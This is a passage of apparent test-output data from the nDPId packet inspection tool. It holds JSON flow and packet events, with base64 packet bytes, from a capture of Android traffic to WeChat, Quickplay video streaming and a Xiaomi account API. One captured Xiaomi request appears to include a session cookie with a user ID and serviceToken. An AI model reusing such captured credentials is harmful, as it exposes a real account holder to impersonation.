zU+RTudhZL4Gple7Zf9xhKfQFyWOsUn76k3fkX1zxQlXwkMtX73RmtTyaB3L2pN7AlVM\/\/nWHu7EuLuT9DL9C5g0C9ndUmqL7NBsK0kAZZ78eDPfrNcCw\/ZFw2bNcbUFc\/DZYsLjg+otfm91LhV9Jp43mlKbIVnnDPmIDKMqjiCMwbTaSaZixrFny1uf5O00Y6dqEgtz9Pli4PyDpRhyoCvJu+i4H+d88Uaw2rkO46JoXyB7A5p5OjjhlkqrGyi1CwU0deobjNdyyDdV8jJ\/Pi9n3PsmZZgmuJXbUr3Wj33YeDG\/0Oj+2II0vRU4R2CMhv6eJcxCNdiNxlxN6WMj7SN4Xwx9cQTGloH0v9P+ZbhisAixQQx+c7VnS53a6eMHAGjtfp5Vfl\/a+fbz\/SS6+0wsbw43YigcJZdKwu\/J+7R2Vsvwwp\/\/0VJXCclXCvQKK9ZgSyMjcZXFFdVBYQ9ynX2PKUJbCiQo0ZSacbctiB0eo38ldIKG1HQXiG+IvrS8x51f+MHkxe\/Qz6gFVONzxqGI2AuPK799Gz1u48EzIlwqf+hfJ5+80+67LPm7OKnX\/+Hglw20t2bXScSU\/7a\/No7LXMZaiPPFjItOLkydDIZdblKbD9VzRcriDGIikYRE2vOO7ef0bABx9ekxq7Y6qOz8wz2bfi82kKdO6ZKos8mJ6Z5zMskbhz5TARjuFwb\/y0CNvNRI3ZzaCcWvcSerQm6YI5Qkh9hi+UFoCigmvOa40ltrSAgZJLwEzoigbbL\/Fux90aNws71lhYIk5rLapLHllGTYci4NeZq+lysN0NJeGSVgJjhywSjEcv98KS01SOoGP+L8hkrHHDndozayAIZx7KNatPdBhHierZx9hk7YaR2QyAaOf\/KGZ26mtXJD+fZ9qzzRf7VPOJIXRan6Mvh2X5ksvc+d2E+xpW4ZS3heqwr3GFyseSzu+SItPTkyOePTh5SBKlnurq4GBXzKzTiVp1gCObUjjb361kLXFDG8pv8RFHz9T71D1Nc2wSTzFugnvV1UNFiSfCUv5Hf3vreasQSxEc5M2HufON7Ls2Sq1av0HxiKW3cr3g1hTf6isQpBvLi2kzfVTuUfjZ4NfuituEBPk76dM0NGhwCE37DhDWyEA0CskC\/3LGpzpkwJVXZJneb4tZ6ZUUp9Tq8jwnKJrc9Xm0\/K+NOqhD9cfXeA0wPmIBqb\/50HOtK0ivaxJQrriFNfYzXGvwDWExqj3032B+UnoRZ9sdl+HDci1tJl2ZYTWQ\/jnW4QU+eyZsftpA1fidaKNXFUm98r6LCSgwEpKQko1ga3+vGDjVtQbFJqqZZSUhMiGE7JxSiWQR6m1VFOyrIP\/NGSlhQwEVU0AVlSc0flRUDOO1ef3Q8CCp+aj8TUh3wwIIfQUflA=="} +00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":35,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000054595,"flow_last_seen":1429000054595,"flow_idle_time":7560000,"flow_min_l4_payload_len":560,"flow_max_l4_payload_len":560,"flow_tot_l4_payload_len":560,"flow_avg_l4_payload_len":560,"midstream":1,"thread_ts_msec":1429000054595,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"203.205.129.101","src_port":42762,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +01212{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":35,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1429000054595,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":616,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":616,"pkt_l4_len":580,"thread_ts_msec":1429000054595,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAljROkAAPwZnAgo2qfrLzYFlpwoAUAw7AlWKyQifUBgAbo2ZAABQT1NUIGh0dHA6Ly9oa2V4dHNob3J0LndlaXhpbi5xcS5jb20vY2dpLWJpbi9taWNyb21zZy1iaW4vYW5kcm9pZGdjbXJlZyBIVFRQLzEuMQ0KQWNjZXB0OiAqLyoNCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQpDb25uZWN0aW9uOiBjbG9zZQ0KQ29udGVudC1MZW5ndGg6IDI5MQ0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi9vY3RldC1zdHJlYW0NCkhvc3Q6IGhrZXh0c2hvcnQud2VpeGluLnFxLmNvbQ0KVXNlci1BZ2VudDogTWljcm9NZXNzZW5nZXIgQ2xpZW50DQoNCo1fJgEAQVUr0H3fAhACF0hkbD5sDN+EgwDvBPUC9wHE3QEChNVx4ZIME2Cf+At3im0FbHQtQ5OeVwRjPIiyLiTcUNpigxgohLu4Sn2cUUhjM\/e6hatoyLaBnD1MiX1aSCFGHqc7sd1LbQ4Ji50\/nmut+cRtfu64v\/XpBgMs3P9k27B87PKWuZeRn0c7PoUNWA2a8JliIiEG\/iNlGYYh7Jh9YEWG\/gDJeOxQbfTuL3jKYttVpQbSW5W7M23rsRNXzMxlPjm7V+eiXogw4ZTrI0SYQBetGJTy4I9tf1xmHMyE6HsFYIlHFXzsGgJQf7uh78Qo0Kz+t0syWOECVQvp3s423G3nllPk9jmdcOLrj5HgsV0zUjYpYNBzzWvoRGUwiRoLkw=="} +00833{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":35,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000054595,"flow_last_seen":1429000054595,"flow_idle_time":7560000,"flow_min_l4_payload_len":560,"flow_max_l4_payload_len":560,"flow_tot_l4_payload_len":560,"flow_avg_l4_payload_len":560,"midstream":1,"thread_ts_msec":1429000054595,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"203.205.129.101","src_port":42762,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.QQ","breed":"Fun","category":"Chat"},"http": {"hostname":"hkextshort.weixin.qq.com","url":"http:\/\/hkextshort.weixin.qq.com\/cgi-bin\/micromsg-bin\/androidgcmreg","code":0,"content_type":"","user_agent":"MicroMessenger Client"}} +01052{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1429000054688,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":500,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":500,"pkt_l4_len":464,"thread_ts_msec":1429000054688,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAeRjvEAAPwaG4wo2qfp4HCMoyykAUHABs6PLUc5cUBgk\/ZRuAABHRVQgL3NlZy92b2wxL3MvV2FybmVyL3FwbWV6emhhd2tkaWdpdGFsY29udGFnaW9uMjA1NDAzM2ZlYXR1cmVlbmdsaXNoMjBsdHJ0MjM5NzZmcHM3ODM0MTkyLzIwMTUtMDItMDIvU1RWODBSMTkyL3FwbWV6ei1IYXdrX0RpZ2l0YWxfQ09OVEFHSU9OXzIwNTQwMzNfRkVBVFVSRV9FTkdMSVNIXzJfMF9MVFJUXzIzOTc2ZnBzXzc4MzQxOTIubTJ0X1NUVjgwUjE5Mi0wMDIxLnRzIEhUVFAvMS4xDQpIb3N0OiB2b2Qtc2luZ3RlbGhhd2sucXVpY2twbGF5LmNvbQ0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAgKExpbnV4OyBBbmRyb2lkIDQuNC40OyBNSSAzVyBCdWlsZC9LVFU4NFApIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIFZlcnNpb24vNC4wIENocm9tZS8zMy4wLjAuMCBNb2JpbGUgU2FmYXJpLzUzNy4zNg0KDQo="} +00733{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1429000054967,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":261,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":261,"pkt_l4_len":225,"thread_ts_msec":1429000054967,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcAPUEEkAArQbHccvNgWUKNqn6AFCnCorJCJ8MOwSFUBgII8UCAABIVFRQLzEuMSAyMDAgT0sNCkNvbm5lY3Rpb246IGNsb3NlDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL29jdGV0LXN0cmVhbQ0KQ29udGVudC1EaXNwb3NpdGlvbjogYXR0YWNobWVudDsgZmlsZW5hbWU9bWljcm9tc2dyZXNwLmRhdA0KQ29udGVudC1MZW5ndGg6IDQ3DQoNCn5fAAAAAFUr0H3fAhACF0hkbD5sDN+EgwDvBAYGAAAXudj2eCNNjv4Uv\/n42\/lx"} +00732{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1429000055158,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":261,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":261,"pkt_l4_len":225,"thread_ts_msec":1429000055158,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcAPUJYkAArAas5svNl6AKNqn6AFDWZdcfCppPknoiUBkIIrzXAABIVFRQLzEuMSAyMDAgT0sNCkNvbm5lY3Rpb246IGNsb3NlDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL29jdGV0LXN0cmVhbQ0KQ29udGVudC1EaXNwb3NpdGlvbjogYXR0YWNobWVudDsgZmlsZW5hbWU9bWljcm9tc2dyZXNwLmRhdA0KQ29udGVudC1MZW5ndGg6IDQ3DQoNCn5fAAAAAFUr0H3fAhACF0hkbD5sDN+EgwD\/BAgIAACTADJ0e1hwz8xBqPPud44t"} +01158{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":67,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1429000052217,"flow_last_seen":1429000090450,"flow_idle_time":7560000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":19212,"flow_avg_l4_payload_len":600,"midstream":1,"thread_ts_msec":1429000090450,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52009,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"vod-singtelhawk.quickplay.com","url":"vod-singtelhawk.quickplay.com\/seg\/vol1\/s\/Warner\/qpmezzhawkdigitalcontagion2054033featureenglish20ltrt23976fps7834192\/2015-02-02\/STV80R192\/qpmezz-Hawk_Digital_CONTAGION_2054033_FEATURE_ENGLISH_2_0_LTRT_23976fps_7834192.m2t_STV80R192-0020.ts","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 4.4.4; MI 3W Build\/KTU84P) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/33.0.0.0 Mobile Safari\/537.36"}} +00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":83,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000110390,"flow_last_seen":1429000110390,"flow_idle_time":7560000,"flow_min_l4_payload_len":625,"flow_max_l4_payload_len":625,"flow_tot_l4_payload_len":625,"flow_avg_l4_payload_len":625,"midstream":1,"thread_ts_msec":1429000110390,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"203.205.147.215","src_port":35670,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +01297{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1429000110390,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":681,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":681,"pkt_l4_len":645,"thread_ts_msec":1429000110390,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAApm620AAPwZqrgo2qfrLzZPXi1YAUBkYU+pems3wUBgAbqLPAABQT1NUIGh0dHA6Ly9oa21pbm9yc2hvcnQud2VpeGluLnFxLmNvbS9jZ2ktYmluL21pY3JvbXNnLWJpbi9ydGt2cmVwb3J0IEhUVFAvMS4xDQpBY2NlcHQ6ICovKg0KQ2FjaGUtQ29udHJvbDogbm8tY2FjaGUNCkNvbm5lY3Rpb246IGNsb3NlDQpDb250ZW50LUxlbmd0aDogMzU1DQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL29jdGV0LXN0cmVhbQ0KSG9zdDogaGttaW5vcnNob3J0LndlaXhpbi5xcS5jb20NClVzZXItQWdlbnQ6IE1pY3JvTWVzc2VuZ2VyIENsaWVudA0KDQqNXyYBAEFVK9B93wIQAhdIZGw+bAzfhIMAzAXaBLgCxN0BAsPj4k0n0ICdjYK52ViOWnOC4Vzgxi7+iegOsMW+oW6QdEAHg+UlyxaSBb9\/s0oeR4gum6gk+uWhqjv3Tkoz3jpOxZ3uqg5IoeAevVK78mE+75Mm5QEXaL\/24wa8I4nsiJTVEr54yg9WsIjA1I\/cd65YM57jS4+t1kJ\/xpqwwPsMfqK2G34N85Xo0uWP1F2PyLEjHiJZyK4xRu\/XYVzahdDn1vQRPtqQ3i2o6ggKNGN3kBkFa6C2GO0zTqwt7XUYqb0ppGq3KKIyPCtrTg5YICuEsfTDMTLer3J067M5VD93Ij+RkxqqGFN9+gvu+C\/smM0OksnEYsvtVnkr65ZF5Pk4qVPYHRDIlRcRHe0XzckIkJitYHFr8VSN2R6GxFfZK0YtMPQdmLxH6qLecheL3Cuuz7XcYpBc6JGpDIih+q4v"} +00834{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":83,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000110390,"flow_last_seen":1429000110390,"flow_idle_time":7560000,"flow_min_l4_payload_len":625,"flow_max_l4_payload_len":625,"flow_tot_l4_payload_len":625,"flow_avg_l4_payload_len":625,"midstream":1,"thread_ts_msec":1429000110390,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"203.205.147.215","src_port":35670,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.QQ","breed":"Fun","category":"Chat"},"http": {"hostname":"hkminorshort.weixin.qq.com","url":"http:\/\/hkminorshort.weixin.qq.com\/cgi-bin\/micromsg-bin\/rtkvreport","code":0,"content_type":"","user_agent":"MicroMessenger Client"}} +00736{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":84,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1429000110528,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":262,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":262,"pkt_l4_len":226,"thread_ts_msec":1429000110528,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcAPYrhEAArQaNjMvNk9cKNqn6AFCLVl6azfAZGFZbUBgIKKjyAABIVFRQLzEuMSAyMDAgT0sNCkNvbm5lY3Rpb246IGNsb3NlDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL29jdGV0LXN0cmVhbQ0KQ29udGVudC1EaXNwb3NpdGlvbjogYXR0YWNobWVudDsgZmlsZW5hbWU9bWljcm9tc2dyZXNwLmRhdA0KQ29udGVudC1MZW5ndGg6IDQ4DQoNCoJfAAAAAFUr0H3fAhACF0hkbD5sDN+EgwDMBQYGAIBAF7nY9ngjTY7+FL\/5+Nv5cQ=="} +00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":90,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000117728,"flow_last_seen":1429000117728,"flow_idle_time":7560000,"flow_min_l4_payload_len":582,"flow_max_l4_payload_len":582,"flow_tot_l4_payload_len":582,"flow_avg_l4_payload_len":582,"midstream":1,"thread_ts_msec":1429000117728,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"54.179.140.65","src_port":56381,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +01235{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":90,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1429000117728,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":638,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":638,"pkt_l4_len":602,"thread_ts_msec":1429000117728,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAm69YkAAPwYFAwo2qfo2s4xB3D0AUJYYUVzgorreUBgAc7mmAABHRVQgL3Bhc3MvdjIvc2FmZS91c2VyL2NvcmVJbmZvP3NpZ25hdHVyZT11JTJGNzNkRVhCSGJlamV2MElTTnduR3l5ZmVUdyUzRCZ1c2VySWQ9TXo1WHI1VVhLdXc4M2h4ZDZZbXMydyUzRCUzRCBIVFRQLzEuMQ0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQNCkNvb2tpZTogY1VzZXJJZD1SbmVTNDhuLWRZX1ZlMllKU3NWLXF0RUxvOG87IHNlcnZpY2VUb2tlbj1qYWl5azdjUlQ0WDI0RWp3eENnQUxHOEFJdk9pWmNWTFU1cCsyaW9HSzVaK1MrWDFLbkJwOHBGUDJIV3FhVFJEWHU1eUY3YjZqaDdYdDQxZTZZOXYyUVRGN2tnbUhrSjBhSXJ0Sm9iOTBaZ2lBMy8rYlZQWXBrcVM3ajhUREorNEo3Rkt3VzFsZDZCWSswakU4SncxbGYrTVE0OEVUQmlOc01FbEthUGh2MEREOVZvUlMxNXRVM2dSMHlmVEcxWHMNClVzZXItQWdlbnQ6IERhbHZpay8xLjYuMCAoTGludXg7IFU7IEFuZHJvaWQgNC40LjQ7IE1JIDNXIE1JVUkvVjYuNC4yLjAuS1hETUlDQikNCkhvc3Q6IGFwaS5hY2NvdW50LnhpYW9taS5jb20NCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcA0KDQo="} +00954{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":90,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000117728,"flow_last_seen":1429000117728,"flow_idle_time":7560000,"flow_min_l4_payload_len":582,"flow_max_l4_payload_len":582,"flow_tot_l4_payload_len":582,"flow_avg_l4_payload_len":582,"midstream":1,"thread_ts_msec":1429000117728,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"54.179.140.65","src_port":56381,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"},"http": {"hostname":"api.account.xiaomi.com","url":"api.account.xiaomi.com\/pass\/v2\/safe\/user\/coreInfo?signature=u%2F73dEXBHbejev0ISNwnGyyfeTw%3D&userId=Mz5Xr5UXKuw83hxd6Yms2w%3D%3D","code":0,"content_type":"","user_agent":"Dalvik\/1.6.0 (Linux; U; Android 4.4.4; MI 3W MIUI\/V6.4.2.0.KXDMICB)"}} +01505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":92,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1429000118045,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":831,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":831,"pkt_l4_len":795,"thread_ts_msec":1429000118045,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcAy+57kAArQaZmTazjEEKNqn6AFDcPeCiut6WGFOiUBgIJVI5AABIVFRQLzEuMSAyMDAgT0sNCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQpDb250ZW50LUVuY29kaW5nOiBnemlwDQpEYXRlOiBUdWUsIDE0IEFwciAyMDE1IDA4OjI4OjM3IEdNVA0KU2VydmVyOiBUZW5naW5lLzIuMC4xDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL2pzb247Y2hhcnNldD11dGYtOA0KQ29udGVudC1MZW5ndGg6IDU1Ng0KDQofiwgAAAAAAAADBMHXokMwAADQD+pDVCuuR7VCzdrerESNxijK199zgLVnYggNE5ULioIZGP6CKSQ+J1Ue9LQPP\/PeL9xYw3Gkgs8aCeFd\/zZqCdqbSs4SDagv3Q8gbXJOLHNZZfmdTsJ6vPDYpe+\/rdailf+Vy4WCt5JCSfPLvLm\/VjBPjj45GMX6eUks60t+xxt21vhZm+cZaqa7DoZ7yob2ejBdIHAVjR1TTdJhFubG5KBya8nY0zzMWLsuzvCvt9glIynGQHg+BLRZzPC8ZTGPUyOvUh05tiZ\/balrrwKQt2cEeJstEBP0D5BLZnKvY160w+\/OrxB+sjFauMt5dnHUcI3t7SoTqChgxCrhMkNhG6YVl2LK8pgjuYhqcDRox+KgQzOA\/hLmGzg3uirtssbFIVC5Aro3ACcGCwISGwb1VxWHonPvyWHNDlG81Bqq3QQetunNZnl6oz4rq\/ZHNPTVG61wMgLdvvo4GWhjgZ\/bnblrSFNGd7Mdr5MexXVx6SfeJVyvwBelPETxWHKKoRDa8ZjUvT0cEJOB7G\/G7e4ZZ\/83OAc7CIIAAEA\/iIulwzriBqhJkUE6bpVlTg1QY+rX1\/uCF5JNOyMtykH7DdhqEwaXY8s7mPz38wS8mngvjnR+4AS+bZOCqFuqMeaMn6SzJIMOPFhSp7GcsxUbtqiwMa7\/yvtnpf2t24H4WaAC+sVExSgCQaWyVTSeVY6vezz8ABeIl3WAAgAA"} +00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":105,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000153937,"flow_last_seen":1429000153937,"flow_idle_time":7560000,"flow_min_l4_payload_len":446,"flow_max_l4_payload_len":446,"flow_tot_l4_payload_len":446,"flow_avg_l4_payload_len":446,"midstream":1,"thread_ts_msec":1429000153937,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52017,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +01056{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":105,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1429000153937,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":502,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":502,"pkt_l4_len":466,"thread_ts_msec":1429000153937,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAeag6kAAPwZJswo2qfp4HCMoyzEAUC00WpDdwOXGUBgBycCpAABHRVQgL3NlZy92b2wxL3MvV2FybmVyL3FwbWV6emhhd2tkaWdpdGFsY29udGFnaW9uMjA1NDAzM2ZlYXR1cmVlbmdsaXNoMjBsdHJ0MjM5NzZmcHM3ODM0MTkyLzIwMTUtMDItMDIvU1RWNTEwUjM2MC9xcG1lenotSGF3a19EaWdpdGFsX0NPTlRBR0lPTl8yMDU0MDMzX0ZFQVRVUkVfRU5HTElTSF8yXzBfTFRSVF8yMzk3NmZwc183ODM0MTkyLm0ydF9TVFY1MTBSMzYwLTAwNDgudHMgSFRUUC8xLjENCkhvc3Q6IHZvZC1zaW5ndGVsaGF3ay5xdWlja3BsYXkuY29tDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoTGludXg7IEFuZHJvaWQgNC40LjQ7IE1JIDNXIEJ1aWxkL0tUVTg0UCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzMzLjAuMC4wIE1vYmlsZSBTYWZhcmkvNTM3LjM2DQoNCg=="} +01150{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":105,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000153937,"flow_last_seen":1429000153937,"flow_idle_time":7560000,"flow_min_l4_payload_len":446,"flow_max_l4_payload_len":446,"flow_tot_l4_payload_len":446,"flow_avg_l4_payload_len":446,"midstream":1,"thread_ts_msec":1429000153937,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52017,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"vod-singtelhawk.quickplay.com","url":"vod-singtelhawk.quickplay.com\/seg\/vol1\/s\/Warner\/qpmezzhawkdigitalcontagion2054033featureenglish20ltrt23976fps7834192\/2015-02-02\/STV510R360\/qpmezz-Hawk_Digital_CONTAGION_2054033_FEATURE_ENGLISH_2_0_LTRT_23976fps_7834192.m2t_STV510R360-0048.ts","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 4.4.4; MI 3W Build\/KTU84P) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/33.0.0.0 Mobile Safari\/537.36"}} +02356{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":106,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1429000156273,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1456,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":1456,"pkt_l4_len":1420,"thread_ts_msec":1429000156273,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcBaB3UUAArQYBdngcIygKNqn6AFDLMd3LpTQtNFxOUBAIItXfAAChEIrgrleYAhFa3F3938BggSrcIn+nqVX5sByKXTUtTZ+S0IwO\/hIwf0BB2uc3Bf5jC1QfzUHjRvDUIOnnsb5a0uxxhiIVAqWnEYC45w18yjCMLPuOKVZeOYgfCQVjYsxLAKkdXaRkmMu4Zoel0HztrVYR1cnta\/vSYGQ0WkMhgl3KFYUm\/X4qjjWEdowcfDAWr\/FWJBR4jsXSxR8EQOd7RYpfWOl0YqAXrcURgivoA\/Vazm9dSSQ6DzW0D1TNTghMrqCseZaLLp2diY5etWqcT5Lxxdnl2ino6PEahKmf04RjOZq83lwn5PEPti9QeNcfMNctSiHj28O5VeDtauVKLipzStAYJu6O1tMaMLByrHeLYYc5MbsLRR9vao6KZRnJE1AEzpmLa\/+YrNJZcLrW3joqQ2AvZzJNsHv1pr7090xMkT87olqCX5Yd5dgxMvv2CbBfzbv7iN0239xxLePmefbZXxmf1ljpyZUWt+YUi19f0cGaafC5roKKnRsDLjalFhQzNZMDN1+qROgcpPpFrfcPRzSCRX2oM3IXqFNyhnIqEBeoqjt\/rN0OghieSXA+J4\/fnibDY2oBF\/qPi7PmT7+EZQfp4dOU7LXGxwfkHyb\/+nSUhuDDHBPkRtLg+XO3xXfDG63CCzgP9j+ew7ylJL7s8zjEAnk0iP7KsAXK1fFcvUkB5LITD3qa1hjsRXNIyWIaxMkwR8GhlPLtf0hpPiS0Um8a1yduUSn4xM5n3AHwQrDyknL7fxErOcmIBqXcP2oyyyTV+m9b64iHrtRxBINGeYaff6lhmqnRqCvGC1F52Og\/seNDfW8RWv4yBXzQwblMI7xviVAgMjEyKmjtOXwyzWj0J+YuHjA3wXbbyRFf\/zujxfqXq0HOg5HobG69sZOgCtlNOxGxs6uNG3Nyl1bm6YuhORfGFVH4dDhxB4pM4mawqKQgNd3ZivrDKzWiLphhw89pFSEPmrYR+dSw4\/6dNuOLRnG16Am5LUzsom4k95ky9x\/PVPzeU+5ie6mhYpgOrbjeFpz+rg+m9C+NB8SEBd6muVe4B37GCYUkUck7iEmhbPSKsrUqKYVveBJ0WJIstk9mKFzxlfKH3J2\/bjYqxEQYbmgG6oJ5ralnDKawN31PTuvOshsQceM7W53\/H7rfpivL6lr\/kjGpOhEd9Dxxlf9p+4v7nxfQAiorCo+Ipnx1Vx4\/M8DFoeolmxcpnpC1\/t87cEimWGKlQKNWBmqgBX3lF+jG0RumppZSWz\/aQfU6VQwCojXD7XsZoKlt0fqkAcQPgNbx4gtOwebSddbvGBn7uPBEFCe1qtOY1P6e8nyGK8y1LANkR3tsNsXJFvHkj5HBf+Fth6gbnan75B2fOeWrkdUU90lajYKwLL1LL5gxqWv1nPgRm5gG0V\/LUY3dCEIra5BI+d3CAtAPKtdluT\/JXWML4j3eAT74+s9ouu5yox25rXWvrCvhcuf5BYDjdzBBmrYB\/t4fb52bttXAQuL80qQnY5Oj1X5f+Um3rpgjwFtGj7n30bbQASEZTdFPUOe8kJs7mBkrIY6yotsjZG+hKNfMJZdhU8ZShuzC8djNjp9NuCLli+\